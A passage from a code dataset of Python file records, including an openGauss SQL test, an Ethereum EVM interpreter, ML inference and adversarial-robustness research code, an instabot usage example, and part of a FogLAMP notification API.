Node('dbuser')\n self.DB_ENV_PATH = macro.DB_ENV_PATH\n\n def test_right(self):\n encoding = ['SQL_ASCII', 'UTF-8']\n sql_cmd = \"SELECT overlay('和卡拉和梵蒂冈' placing '猕猴桃666' from 4 for 9 );\"\n result = [\"和猕猴桃666梵蒂冈\", \"和卡拉猕猴桃666\"]\n\n for i in range(2):\n # 创建数据库\n db_create = f\"\"\"drop database if exists aaa;\n create database aaa encoding = '{encoding[i]}';\"\"\"\n msg1 = self.commonsh.execut_db_sql(db_create)\n logger.info(msg1)\n self.assertTrue('CREATE' in msg1)\n # 连接新建的编码类型的库执行sql语句\n cmd1 = f'''source {self.DB_ENV_PATH};\n gsql -d aaa -p {self.userNode.db_port} -c \"{sql_cmd}\"'''\n msg2 = self.userNode.sh(cmd1).result()\n logger.info(msg2)\n self.assertTrue(msg2.splitlines()[-2].strip() == result[i])\n # 删除数据库\n db_drop = f'''drop database aaa;'''\n msg3 = self.commonsh.execut_db_sql(db_drop)\n logger.info(msg3)\n self.assertTrue('DROP' in msg3)\n\n def tearDown(self):\n logger.info('--------Opengauss_Function_Innerfunc_Overlay_Case0004.py执行结束--------')"} {"ext": "py", "sha": "1a2ff2cf5841c7d94e23405e4f6c9a7b0ee641e6", "content": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"\".split(';') if \"\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"gazebo_ros\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"\".split(';') if \"\" != \"\" else []\nPROJECT_NAME = \"turtlebot3_description_reduced_mesh\"\nPROJECT_SPACE_DIR = \"/home/ubuntu/environment/HelloWorld/simulation_ws/build/turtlebot3_description_reduced_mesh/devel\"\nPROJECT_VERSION = \"1.1.0\"\n"} {"ext": "py", "sha": "1a2ff3a4303be91e30df11d584e36598bd4917c2", "content": "GeometryConf={\n 'DBExtended' : 'DB:Extended',\n 'DBExtendedGFlash' : 'DB:ExtendedGFlash',\n 'DBExtendedLiMax' : 'DB:ExtendedLiMax',\n 'DBExtendedLiMin' : 'DB:ExtendedLiMin',\n 'DBExtendedX0Max' : 'DB:ExtendedX0Max',\n 'DBExtendedX0Min' : 'DB:ExtendedX0Min',\n 'DBExtended2015' : 'DB:Extended',\n 'DBExtended2017' : 'DB:Extended',\n 'DBExtended2017ZeroMaterial' : 'DB:Extended2017ZeroMaterial',\n 'DBExtended2018' : 'DB:Extended',\n 'DBExtended2021' : 'DB:Extended',\n 'DBExtended2026' : 'DB:Extended2026',\n 'DBIdeal2015' : 'DB:Ideal2015',\n 'DBIdeal2015dev' : 'DB:Ideal2015dev',\n 'Ideal2015' : 'Ideal2015,Ideal2015Reco',\n 'Ideal2015dev' : 'Ideal2015dev,Ideal2015devReco',\n 'Extended' : 'Extended,ExtendedReco',\n 'Extended2015' : 'Extended2015,Extended2015Reco',\n 'Extended2015dev': 'Extended2015dev,Extended2015devReco',\n 'Extended2016' : 'Extended2016,Extended2016Reco',\n 'Extended2017' : 'Extended2017,Extended2017Reco',\n 'Extended2018' : 'Extended2018,Extended2018Reco',\n 'Extended2017Plan1' : 'Extended2017Plan1,Extended2017Plan1Reco',\n 'Extended2017Plan1ZeroMaterial' : 'Extended2017Plan1ZeroMaterial,Extended2017Plan1ZeroMaterialReco',\n 'Extended2021' : 'Extended2021,Extended2021Reco',\n 'All' : 'Configuration.Geometry.GeometrySimAll_cff,Reco',\n 'ECALHCAL' : 'Configuration.Geometry.GeometrySimECALHCAL_cff,Configuration.Geometry.GeometryRecoECALHCAL_cff',\n 'TrackerOnly' : 'Configuration.Geometry.GeometrySimTracker_cff,Configuration.Geometry.GeometryRecoTracker_cff',\n 'HCal' : 'Configuration.Geometry.GeometrySimHCAL_cff,Configuration.Geometry.GeometryRecoHCAL_cff',\n 'Extended2026D35' : 'Extended2026D35,Extended2026D35Reco',\n 'Extended2026D41' : 'Extended2026D41,Extended2026D41Reco',\n 'Extended2026D43' : 'Extended2026D43,Extended2026D43Reco',\n 'Extended2026D44' : 'Extended2026D44,Extended2026D44Reco',\n 'Extended2026D45' : 'Extended2026D45,Extended2026D45Reco',\n 'Extended2026D46' : 'Extended2026D46,Extended2026D46Reco',\n 'Extended2026D47' : 'Extended2026D47,Extended2026D47Reco',\n }\n"} {"ext": "py", "sha": "1a2ff41ce31e65dadf81b74360bf9e1cdebdf445", "content": "\"\"\"\nEthereum Virtual Machine (EVM) Interpreter\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. contents:: Table of Contents\n :backlinks: none\n :local:\n\nIntroduction\n------------\n\nA straightforward interpreter that executes EVM code.\n\"\"\"\nfrom dataclasses import dataclass\nfrom typing import Iterable, Set, Tuple, Union\n\nfrom ethereum.base_types import U256, Bytes0, Uint\nfrom ethereum.utils.ensure import EnsureError, ensure\n\nfrom ..eth_types import Address, Log\nfrom ..state import (\n account_has_code_or_nonce,\n begin_transaction,\n commit_transaction,\n get_account,\n increment_nonce,\n move_ether,\n rollback_transaction,\n set_code,\n touch_account,\n)\nfrom ..utils.address import to_address\nfrom ..vm import Message\nfrom ..vm.error import (\n InsufficientFunds,\n InvalidJumpDestError,\n InvalidOpcode,\n OutOfGasError,\n StackDepthLimitError,\n StackOverflowError,\n StackUnderflowError,\n)\nfrom ..vm.gas import GAS_CODE_DEPOSIT, REFUND_SELF_DESTRUCT, subtract_gas\nfrom ..vm.precompiled_contracts.mapping import PRE_COMPILED_CONTRACTS\nfrom . import Environment, Evm\nfrom .instructions import Ops, op_implementation\nfrom .runtime import get_valid_jump_destinations\n\nSTACK_DEPTH_LIMIT = U256(1024)\nMAX_CODE_SIZE = 0x6000\nRIPEMD160_ADDRESS = to_address(Uint(3))\n\n\n@dataclass\nclass MessageCallOutput:\n \"\"\"\n Output of a particular message call\n\n Contains the following:\n\n 1. `gas_left`: remaining gas after execution.\n 2. `refund_counter`: gas to refund after execution.\n 3. `logs`: list of `Log` generated during execution.\n 4. `accounts_to_delete`: Contracts which have self-destructed.\n 5. `touched_accounts`: Accounts that have been touched.\n 6. `has_erred`: True if execution has caused an error.\n \"\"\"\n\n gas_left: U256\n refund_counter: U256\n logs: Union[Tuple[()], Tuple[Log, ...]]\n accounts_to_delete: Set[Address]\n touched_accounts: Iterable[Address]\n has_erred: bool\n\n\ndef process_message_call(\n message: Message, env: Environment\n) -> MessageCallOutput:\n \"\"\"\n If `message.current` is empty then it creates a smart contract\n else it executes a call from the `message.caller` to the `message.target`.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n\n env :\n External items required for EVM execution.\n\n Returns\n -------\n output : `MessageCallOutput`\n Output of the message call\n \"\"\"\n if message.target == Bytes0(b\"\"):\n is_collision = account_has_code_or_nonce(\n env.state, message.current_target\n )\n if is_collision:\n return MessageCallOutput(\n U256(0), U256(0), tuple(), set(), set(), True\n )\n else:\n evm = process_create_message(message, env)\n else:\n evm = process_message(message, env)\n\n accounts_to_delete = collect_accounts_to_delete(evm, set())\n evm.refund_counter += len(accounts_to_delete) * REFUND_SELF_DESTRUCT\n\n return MessageCallOutput(\n gas_left=evm.gas_left,\n refund_counter=evm.refund_counter,\n logs=evm.logs,\n accounts_to_delete=accounts_to_delete,\n touched_accounts=collect_touched_accounts(evm),\n has_erred=evm.has_erred,\n )\n\n\ndef process_create_message(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes a call to create a smart contract.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: :py:class:`~ethereum.spurious_dragon.vm.Evm`\n Items containing execution specific objects.\n \"\"\"\n # take snapshot of state before processing the message\n begin_transaction(env.state)\n\n increment_nonce(env.state, message.current_target)\n evm = process_message(message, env)\n if not evm.has_erred:\n contract_code = evm.output\n contract_code_gas = len(contract_code) * GAS_CODE_DEPOSIT\n try:\n evm.gas_left = subtract_gas(evm.gas_left, contract_code_gas)\n ensure(len(contract_code) <= MAX_CODE_SIZE, OutOfGasError)\n except OutOfGasError:\n rollback_transaction(env.state)\n evm.gas_left = U256(0)\n evm.logs = ()\n evm.accounts_to_delete = dict()\n evm.refund_counter = U256(0)\n evm.has_erred = True\n else:\n set_code(env.state, message.current_target, contract_code)\n commit_transaction(env.state)\n else:\n rollback_transaction(env.state)\n return evm\n\n\ndef process_message(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes a call to create a smart contract.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: :py:class:`~ethereum.spurious_dragon.vm.Evm`\n Items containing execution specific objects\n \"\"\"\n if message.depth > STACK_DEPTH_LIMIT:\n raise StackDepthLimitError(\"Stack depth limit reached\")\n\n # take snapshot of state before processing the message\n begin_transaction(env.state)\n\n touch_account(env.state, message.current_target)\n\n sender_balance = get_account(env.state, message.caller).balance\n\n if message.should_transfer_value and message.value != 0:\n if sender_balance < message.value:\n rollback_transaction(env.state)\n raise InsufficientFunds(\n f\"Insufficient funds: {sender_balance} < {message.value}\"\n )\n move_ether(\n env.state, message.caller, message.current_target, message.value\n )\n\n evm = execute_code(message, env)\n if evm.has_erred:\n # revert state to the last saved checkpoint\n # since the message call resulted in an error\n rollback_transaction(env.state)\n else:\n commit_transaction(env.state)\n return evm\n\n\ndef execute_code(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes bytecode present in the `message`.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: `ethereum.vm.EVM`\n Items containing execution specific objects\n \"\"\"\n code = message.code\n valid_jump_destinations = get_valid_jump_destinations(code)\n evm = Evm(\n pc=Uint(0),\n stack=[],\n memory=bytearray(),\n code=code,\n gas_left=message.gas,\n env=env,\n valid_jump_destinations=valid_jump_destinations,\n logs=(),\n refund_counter=U256(0),\n running=True,\n message=message,\n output=b\"\",\n accounts_to_delete=dict(),\n has_erred=False,\n children=[],\n )\n try:\n\n if evm.message.code_address in PRE_COMPILED_CONTRACTS:\n PRE_COMPILED_CONTRACTS[evm.message.code_address](evm)\n return evm\n\n while evm.running and evm.pc < len(evm.code):\n try:\n op = Ops(evm.code[evm.pc])\n except ValueError:\n raise InvalidOpcode(evm.code[evm.pc])\n\n op_implementation[op](evm)\n\n except (\n OutOfGasError,\n InvalidOpcode,\n InvalidJumpDestError,\n InsufficientFunds,\n StackOverflowError,\n StackUnderflowError,\n StackDepthLimitError,\n ):\n evm.gas_left = U256(0)\n evm.logs = ()\n evm.accounts_to_delete = dict()\n evm.refund_counter = U256(0)\n evm.has_erred = True\n except (\n EnsureError,\n ValueError,\n ):\n evm.has_erred = True\n finally:\n return evm\n\n\ndef collect_touched_accounts(\n evm: Evm, ancestor_had_error: bool = False\n) -> Iterable[Address]:\n \"\"\"\n Collect all of the accounts that *may* need to be deleted based on\n `EIP-161 `_.\n Checking whether they *do* need to be deleted happens in the caller.\n See also: https://github.com/ethereum/EIPs/issues/716\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n ancestor_had_error :\n True if the ancestors of the evm object erred else False\n\n Returns\n -------\n touched_accounts: `typing.Iterable`\n returns all the accounts that were touched and may need to be deleted.\n \"\"\"\n # collect the coinbase account if it was touched via zero-fee transfer\n if (evm.message.caller == evm.env.origin) and evm.env.gas_price == 0:\n yield evm.env.coinbase\n\n # collect those explicitly marked for deletion\n # (\"beneficiary\" is of SELFDESTRUCT)\n for beneficiary in sorted(set(evm.accounts_to_delete.values())):\n if evm.has_erred or ancestor_had_error:\n # Special case to account for geth+parity bug\n # https://github.com/ethereum/EIPs/issues/716\n if beneficiary == RIPEMD160_ADDRESS:\n yield beneficiary\n continue\n else:\n yield beneficiary\n\n # collect account directly addressed\n if not isinstance(evm.message.target, Bytes0):\n if evm.has_erred or ancestor_had_error:\n # collect RIPEMD160 precompile even if ancestor evm had error.\n # otherwise, skip collection from children of erred-out evm objects\n if evm.message.target == RIPEMD160_ADDRESS:\n yield evm.message.target\n else:\n yield evm.message.target\n\n # recurse into nested computations\n # (even erred ones, since looking for RIPEMD160)\n for child in evm.children:\n yield from collect_touched_accounts(\n child, ancestor_had_error=(evm.has_erred or ancestor_had_error)\n )\n\n\ndef collect_accounts_to_delete(\n evm: Evm, accounts_to_delete: Set[Address]\n) -> Set[Address]:\n \"\"\"\n Collects all the accounts that need to deleted from the `evm` object and\n its children\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n accounts_to_delete :\n list of accounts that need to be deleted.\n Note: An empty set should be passed to this parameter. This set\n is used to store the results obtained by recursively iterating over the\n child evm objects\n\n Returns\n -------\n touched_accounts: `set`\n returns all the accounts that were touched and may need to be deleted.\n \"\"\"\n if not evm.has_erred:\n for address in evm.accounts_to_delete.keys():\n accounts_to_delete.add(address)\n for child in evm.children:\n collect_accounts_to_delete(child, accounts_to_delete)\n return accounts_to_delete\n"} {"ext": "py", "sha": "1a2ff4f07e115816c75cad8a5fba6e76c1da9375", "content": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"simplevae\", # Replace with your own username\n version=\"1.0.0\",\n author=\"Chenxi Wu, Yizi Zhang\",\n author_email=\"chenxi.wu@duke.edu, yizi.zhang@duke.edu\",\n description=\"Final project of STA 663: Implementation of Variational Autoencoder\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/yizi0511/sta_663_vae\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n\t\"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'numpy',\n\t'tensorflow',\n ],\n)\n"} {"ext": "py", "sha": "1a2ff60432bc1611b23789f0e3b556f4022df84f", "content": "from definitions import PATH_INPUT_CSV, PATH_OUTPUT_GEOJSON\nfrom modules.geojson.df_to_geojson import df_to_geojson\nfrom modules.geojson.export_geojson import export_geojson\nfrom modules.init.init_program import init_program\nimport pandas as pd\n\ndef main():\n\n # init\n init_program()\n\n # actions to perform...\n df = pd.read_csv(PATH_INPUT_CSV)\n cols = [\"provnum\",\"name\",\"address\",\"city\",\"state\",\"zip\",\"county\",\"bedcert\",\"ownership\",\"employee_cases\",\n \"resident_cases\", \"resident_deaths\",\"cna_hprd\",'lpn_hprd',\"rn_hprd\",\"total_hprd\"]\n geojson_dict = df_to_geojson(df, cols, lon=\"google_long\", lat=\"google_lat\")\n export_geojson(geojson_dict, PATH_OUTPUT_GEOJSON)\n\n\n\n\nif __name__ == '__main__':\n main()"} {"ext": "py", "sha": "1a2ff622703e4f13a0742c22b66b54ea0b634262", "content": "from lstm import BilstmAttention\r\nfrom config import LSTMConfig\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport directory\r\n\r\n\r\ndef load_model(weight_path):\r\n print(weight_path)\r\n model = BilstmAttention(embed_num=859)\r\n model.load_state_dict(torch.load(weight_path)) # 返回的是一个OrderDict,存储了网络结构的名字和对应的参数\r\n model.to(device)\r\n model.eval()\r\n return model\r\n\r\n\r\n@torch.no_grad()\r\ndef predict(texts):\r\n pres_all = []\r\n for text in tqdm(texts):\r\n text = [int(i) for i in text.split(' ')]\r\n # 统一样本的长度,这里选择55个词语作为样本长度,多的截断,少的补齐(用858补齐)\r\n seq_len = LSTMConfig.seq_len\r\n if len(text) > seq_len:\r\n text = text[:seq_len]\r\n else:\r\n text = text + [858] * (seq_len - len(text))\r\n\r\n text = torch.from_numpy(np.array(text))\r\n text = text.unsqueeze(0)\r\n text = text.type(torch.LongTensor).cuda()\r\n #\r\n for i in range(len(model_list)):\r\n model = model_list[i]\r\n outputs = model(text)\r\n outputs = outputs.sigmoid().detach().cpu().numpy()[0]\r\n if i == 0:\r\n pres_fold = outputs / len(model_list)\r\n else:\r\n pres_fold += outputs / len(model_list)\r\n\r\n # print(\"bilstm+attention_pres_fold:\",pres_fold)\r\n # print(\"bilstm+attention_pres_fold:\",type(pres_fold))\r\n pres_fold = [str(p) for p in pres_fold]\r\n pres_fold = ' '.join(pres_fold)\r\n pres_all.append(pres_fold)\r\n return pres_all\r\n\r\n\r\nif __name__ == \"__main__\":\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n model_list = []\r\n n_splits = LSTMConfig.n_splits\r\n\r\n for i in range(n_splits):\r\n model_list.append(load_model('./dl/user_data/model_data/label1/LSTMfold_' + str(i + 1) + '_best.pth'))\r\n\r\n test_df = pd.read_csv(directory.SEMI_TEST_SET_B_PATH, header=None)\r\n\r\n test_df.columns = ['report_ID', 'description']\r\n submit = test_df.copy()\r\n print(\"test_df:{}\".format(test_df.shape))\r\n new_des = [i.strip('|').strip() for i in test_df['description'].values]\r\n\r\n '''\r\n # 获取停用词\r\n stopwords_path = './dl/code/test/label1/stopwords.txt'\r\n stopwords = []\r\n with open(stopwords_path, 'r', encoding='utf-8') as f:\r\n for line in f:\r\n if len(line) > 0:\r\n stopwords.append(line.strip())\r\n # 去掉new_des_test中的停用词\r\n for j in range(0, len(new_des)):\r\n str2lst = new_des[j].split()\r\n copy = str2lst[:]\r\n for i in copy:\r\n if i in stopwords:\r\n copy.remove(i)\r\n str2lst = copy\r\n lst2str = \" \".join(str(i) for i in str2lst)\r\n new_des[j] = lst2str\r\n '''\r\n\r\n test_df['description'] = new_des\r\n sub_id = test_df['report_ID'].values\r\n\r\n print(sub_id[0])\r\n save_dir = './dl/prediction_result/label1/'\r\n\r\n if not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\n\r\n pres_all = predict(new_des)\r\n\r\n str_w = ''\r\n with open(save_dir + 'submit_lstm.csv', 'w') as f:\r\n for i in range(len(sub_id)):\r\n str_w += sub_id[i] + ',' + '|' + pres_all[i] + '\\n'\r\n str_w = str_w.strip('\\n')\r\n f.write(str_w)\r\n"} {"ext": "py", "sha": "1a2ff66e092665412a561a2125c1879ca5d1d219", "content": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Util class for job-related operations.\n\"\"\"\n\nimport contextlib\nimport os\n\nfrom taskflow import engines\nfrom taskflow.persistence import logbook\n\nfrom oslo_utils import uuidutils\n\nfrom pipeline.pipelines import pipeline_factory\nfrom pipeline.utils import backend_helper\n\n\ndef post_remote_pipeline_job(pipeline):\n ME = os.getpid()\n print(\"Starting poster with pid: %s\" % ME)\n my_name = \"poster-%s\" % ME\n persist_backend = backend_helper.default_persistence_backend()\n with contextlib.closing(persist_backend):\n with contextlib.closing(persist_backend.get_connection()) as conn:\n conn.upgrade()\n job_backend = backend_helper.default_jobboard_backend(my_name)\n job_backend.connect()\n with contextlib.closing(job_backend):\n # Create information in the persistence backend about the\n # unit of work we want to complete and the factory that\n # can be called to create the tasks that the work unit needs\n # to be done.\n lb = logbook.LogBook(\"post-from-%s\" % my_name)\n fd = logbook.FlowDetail(\"sample-from-%s\" % my_name,\n uuidutils.generate_uuid())\n lb.add(fd)\n with contextlib.closing(persist_backend.get_connection()) as conn:\n conn.save_logbook(lb)\n\n engines.save_factory_details(fd,\n pipeline_factory.make_pipeline_flow,\n [pipeline.name],\n pipeline.kwargs,\n backend=persist_backend)\n # Post, and be done with it!\n jb = job_backend.post(\"sample-job-from-%s\" % my_name, book=lb)\n print(\"Posted: %s\" % jb)\n return jb\n"} {"ext": "py", "sha": "1a2ff7c55b8ed076fa46d310054279a8163972e9", "content": "import csv\nimport random\nfrom functools import partial\nfrom typing import Callable, Optional\nfrom pdb import set_trace as st\nimport os\nimport random\nimport pandas as pd\nfrom typing import Any, Callable, Dict, Iterable, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nfrom foolbox.attacks import (\n FGSM,\n Attack,\n DeepFoolAttack,\n IterativeGradientSignAttack,\n SaliencyMapAttack,\n)\n# from foolbox.criteria import TargetClass\n# from foolbox.models import TensorFlowModel\nfrom tensorflow.python.training import saver\nfrom tensorflow.python.training.session_manager import SessionManager\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport sklearn.metrics as metrics\nimport scipy.ndimage as ndimage\nimport matplotlib.pyplot as plt\nplt.switch_backend('Agg')\n\nfrom model.config import LENET\nfrom model import LeNet\nimport nninst_mode as mode\nfrom dataset import mnist\nfrom dataset.config import MNIST_TRAIN, MNIST_PATH\nfrom dataset.mnist_transforms import *\nfrom trace.lenet_mnist_class_trace_v2 import (\n data_config,\n)\nfrom trace.common import (\n class_trace,\n)\nfrom tf_utils import new_session_config\nfrom nninst_statistics import calc_trace_side_overlap\nfrom nninst_trace import TraceKey\nfrom nninst_utils.numpy import arg_approx\nfrom nninst_utils.ray import ray_init\nfrom nninst_utils.fs import ensure_dir, IOAction, CsvIOAction, abspath\n\nfrom eval.common import get_overlay_summary, clean_overlap_ratio, \\\n translation_overlap_ratio, attack_overlap_ratio, \\\n lenet_mnist_example\nfrom eval.cw_attack import cw_generate_adversarial_example\nfrom eval.eval_mnist import foolbox_generate_adversarial_example\nfrom eval.cw_attacks import CarliniL2\nfrom nninst_graph import AttrMap, Graph, GraphAttrKey\nfrom nninst_utils.ray import ray_iter\nfrom tf_graph import (\n MaskWeightWithTraceHook,\n model_fn_with_fetch_hook,\n)\nfrom trace.common import (\n get_predicted_value,\n get_rank,\n predict,\n reconstruct_class_trace_from_tf,\n reconstruct_trace_from_tf,\n reconstruct_trace_from_tf_brute_force,\n)\nfrom eval.eval_by_reduced_point import reconstruct_point\nfrom nninst_op import *\nfrom nninst_trace import calc_padding\n\nthreshold = 0.9\ndilation_iter = 1\ndilation_structure = ndimage.generate_binary_structure(2, 2)\n# Model config\nmodel_label = \"augmentation\"\nmodel_dir = f\"result/lenet/model_{model_label}\"\n# Trace config\ntrace_dir = f\"{model_dir}/traces_{threshold}\"\ntrace_name = \"noop\"\ntraining_trace_dir = f\"{model_dir}/per_image_trace_{threshold}/train\"\n# Result dir\nresult_name = \"test\"\n\nresult_dir = f\"{model_dir}/birelation/{threshold}_{dilation_iter}\"\n# result_dir = f\"result/lenet/test\"\nimages_per_class = 1000\nattack_name = \"FGSM\"\n\nattacks = {\n \"FGSM\": [FGSM],\n \"BIM\": [IterativeGradientSignAttack],\n \"JSMA\": [SaliencyMapAttack],\n \"DeepFool\": [DeepFoolAttack],\n # \"DeepFool_full\": [DeepFoolAttack, dict(subsample=None)],\n # \"CWL2\": [CarliniL2],\n}\n\n# DeepFool will shutdown when num_gpu<0.2\nnum_gpus = 0.2\n\noverlap_fn = calc_trace_side_overlap\nper_channel = False\n\nlenet_mnist_class_trace = class_trace(\n trace_name,\n model_config=LENET,\n data_config=data_config,\n )\n\ngraph = LENET.network_class.graph().load()\n\n\ndef reconstruct_edge_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.EDGE,\n):\n attrs = trace.nodes[node_name]\n op = graph.op(graph.id(node_name))\n if key not in attrs:\n return None\n else:\n attr = attrs[key]\n edge = TraceKey.to_array(attr)\n return edge\n\n\ndef reconstruct_point_from_trace_contrib(\n trace,\n graph,\n node_name,\n key = TraceKey.POINT,\n):\n\n attrs = trace.nodes[node_name]\n\n def to_bitmap(shape, attr, contrib):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n pos_attr = attr[contrib > 0]\n mask[TraceKey.to_array(pos_attr)] = 1\n neg_attr = attr[contrib < 0]\n mask[TraceKey.to_array(neg_attr)] = -1\n return mask.reshape(shape)\n\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key], attrs[TraceKey.POINT_CONTRIB])\n else:\n for attr_name, attr in attrs.items():\n if attr_name.startswith(TraceKey.POINT + \".\") and attr is not None:\n return to_bitmap(attrs[TraceKey.POINT_SHAPE], attr)\n RuntimeError(f\"Point key not found in {node_name}\")\n\ndef reconstruct_point_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.POINT,\n):\n\n attrs = trace.nodes[node_name]\n\n def to_bitmap(shape, attr):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = 1\n return mask.reshape(shape)\n\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key])\n else:\n for attr_name, attr in attrs.items():\n if attr_name.startswith(TraceKey.POINT + \".\") and attr is not None:\n return to_bitmap(attrs[TraceKey.POINT_SHAPE], attr)\n RuntimeError(f\"Point key not found in {node_name}\")\n\ndef reconstruct_weight_from_trace_contrib(\n trace,\n graph,\n node_name,\n key = TraceKey.WEIGHT,\n):\n attrs = trace.nodes[node_name]\n def to_bitmap(shape, attr, contrib):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = contrib\n return mask.reshape(shape)\n \n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key], attrs[TraceKey.WEIGHT_CONTRIB])\n else:\n RuntimeError(f\"Weight key not found in {node_name}\")\n\ndef reconstruct_weight_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.WEIGHT,\n):\n attrs = trace.nodes[node_name]\n def to_bitmap(shape, attr):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = 1\n return mask.reshape(shape)\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key])\n else:\n RuntimeError(f\"Weight key not found in {node_name}\")\n\n\ndef reconstruct_point_fn(\n trace,\n):\n node_names = []\n key = TraceKey.POINT\n for attr_name, attr in trace.nodes.items():\n if key in attr:\n node_names.append(attr_name)\n point_dict = {}\n for node_name in [\n \"conv2d/Relu:0\",\n \"conv2d_1/Relu:0\",\n \"dense/BiasAdd:0\",\n \"dense_1/BiasAdd:0\",\n ]:\n point_dict[node_name] = reconstruct_point_from_trace(\n trace,\n graph,\n node_name,\n )\n # print(node_name, point_dict[node_name].shape)\n return point_dict\n\ndef reconstruct_weight_fn(\n trace,\n):\n weight_dict = {}\n for node_name in [\n \"conv2d/Conv2D\",\n \"conv2d_1/Conv2D\",\n ]:\n weight = reconstruct_weight_from_trace(\n trace,\n graph,\n node_name,\n )\n weight = weight.reshape(-1, weight.shape[-2], weight.shape[-1])\n weight_dict[node_name] = weight\n return weight_dict\n\nreconstruct_edge_fn = partial(\n reconstruct_edge_from_trace,\n graph = graph,\n key = TraceKey.EDGE\n)\n"} {"ext": "py", "sha": "1a2ff7d6ee544f38724df5d47c67ff7c9424e404", "content": "\"\"\"\n instabot example\n\n Workflow:\n Like user's, follower's media by user_id.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\nsys.path.append(os.path.join(sys.path[0], '../'))\nfrom instabot import Bot\n\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('-u', type=str, help=\"username\")\nparser.add_argument('-p', type=str, help=\"password\")\nparser.add_argument('-proxy', type=str, help=\"proxy\")\nparser.add_argument('users', type=str, nargs='+', help='users')\nargs = parser.parse_args()\n\nbot = Bot()\nbot.login(username=args.u, password=args.p,\n proxy=args.proxy)\n\nfor username in args.users:\n bot.like_followers(username, nlikes=3)\n"} {"ext": "py", "sha": "1a2ff90b8b9115aeed04b0e1d7443a0af43ffa46", "content": "from .flyweight import Flyweight\n"} {"ext": "py", "sha": "1a2ff916014c9c622853ba156b2f225dc12f0362", "content": "# -*- coding: utf-8 -*-\n\n# FOGLAMP_BEGIN\n# See: http://foglamp.readthedocs.io/\n# FOGLAMP_END\n\nimport json\nimport urllib.parse\nimport aiohttp\nfrom aiohttp import web\n\nfrom foglamp.common import utils\nfrom foglamp.common import logger\nfrom foglamp.common.service_record import ServiceRecord\nfrom foglamp.common.storage_client.exceptions import StorageServerError\nfrom foglamp.common.configuration_manager import ConfigurationManager\nfrom foglamp.services.core import connect\nfrom foglamp.services.core.service_registry.service_registry import ServiceRegistry\nfrom foglamp.services.core.service_registry import exceptions as service_registry_exceptions\nfrom foglamp.common.audit_logger import AuditLogger\n\n__author__ = \"Amarendra K Sinha\"\n__copyright__ = \"Copyright (c) 2018 Dianomic Systems\"\n__license__ = \"Apache 2.0\"\n__version__ = \"${VERSION}\"\n\n_help = \"\"\"\n -------------------------------------------------------------------------------\n | GET | /foglamp/notification/plugin |\n | GET POST PUT DELETE | /foglamp/notification |\n -------------------------------------------------------------------------------\n\"\"\"\n\n_logger = logger.setup()\nNOTIFICATION_TYPE = [\"one shot\", \"retriggered\", \"toggled\"]\n\n\nasync def get_plugin(request):\n \"\"\" GET lists of rule plugins and delivery plugins\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification/plugin\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n url = 'http://{}:{}/notification/rules'.format(_address, _port)\n rule_plugins = json.loads(await _hit_get_url(url))\n\n url = 'http://{}:{}/notification/delivery'.format(_address, _port)\n delivery_plugins = json.loads(await _hit_get_url(url))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'rules': rule_plugins, 'delivery': delivery_plugins})\n\n\nasync def get_type(request):\n \"\"\" GET the list of available notification types\n\n :Example:\n curl -X GET 